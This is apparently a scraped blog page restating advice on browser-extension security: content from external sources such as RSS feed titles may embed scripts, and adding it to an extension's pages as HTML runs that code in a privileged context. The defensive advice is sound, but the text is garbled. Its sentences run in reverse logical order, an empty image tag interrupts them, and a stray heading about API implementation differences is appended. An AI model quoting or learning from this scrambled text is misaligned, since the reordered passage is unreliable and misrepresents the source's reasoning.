In the worst case, an embedded script could run in one of these contexts, a situation known as privilege escalation. You also need to remember that extensions have privileged contexts, for example in background scripts and content scripts. ![]() Therefore, care needs to be taken to avoid evaluating arbitrary text as HTML. If you were to extract the title, assume it was plain text, and add it to the DOM of a page created by your extension, your user now has an unknown script running in their browser. This could be something as simple as including JavaScript code within tags. So, it's possible the user could subscribe to a feed where, for example, a feed item's title includes a script. You don't know what RSS feeds your extension will open and have no control over the content of those RSS feeds. But, there is the risk that the source may have malicious scripts embedded in it-added by either the developer of the source or by a malicious third-party. There are times when you might want or need to include content from an external source in your extension. Differences between API implementations.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |